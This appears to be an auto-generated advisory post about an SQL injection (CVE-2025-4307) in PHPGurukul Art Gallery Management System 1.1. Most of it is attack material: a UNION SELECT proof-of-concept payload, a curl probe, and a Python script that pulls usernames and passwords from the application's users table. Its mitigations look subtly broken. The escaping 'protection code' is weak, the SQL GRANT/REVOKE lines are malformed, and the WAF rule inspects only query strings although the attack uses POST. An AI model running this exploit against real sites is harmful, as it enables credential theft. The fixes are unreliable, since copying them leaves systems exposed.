Listen to this Post
How CVE-2025-4307 Works
The vulnerability exists in the `/admin/add-art-medium.php` file of PHPGurukul Art Gallery Management System 1.1. The `artmed` parameter is improperly sanitized before being used in SQL queries, allowing attackers to inject malicious SQL commands. When crafted input is submitted through this parameter, the backend database executes unintended commands, potentially enabling unauthorized data access, modification, or deletion. The attack can be performed remotely without authentication due to insufficient access controls. The CVSS 4.0 vector (AV:N/AC:L/AT:N/PR:N/UI:N) indicates network-based exploitation with low attack complexity and no privileges required.
DailyCVE Form
Platform: PHPGurukul CMS
Version: 1.1
Vulnerability: SQL Injection
Severity: Critical
Date: 2025-05-05
What Undercode Say:
-- Exploit POC 1' UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100-- -
// Protection Code
$artmed = mysqli_real_escape_string($conn, $_POST['artmed']);
$query = "INSERT INTO mediums (medium_name) VALUES ('$artmed')";
Detection Command curl -X POST "http://target/admin/add-art-medium.php" -d "artmed=1'" | grep "SQL syntax"
Automated Exploit Script
import requests
target = "http://victim.com/admin/add-art-medium.php"
payload = {"artmed":"1' UNION SELECT username,password,3 FROM users-- -"}
r = requests.post(target, data=payload)
print(r.text)
-- Database Hardening REVOKE ALL PRIVILEGES ON . FROM 'gallery_user'@'%'; GRANT SELECT ONLY ON gallery_db. TO 'gallery_user'@'localhost';
WAF Rule
location /admin/ {
set $block_sql_inject 0;
if ($query_string ~ "union.select") {
set $block_sql_inject 1;
}
if ($block_sql_inject = 1) {
return 403;
}
}
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
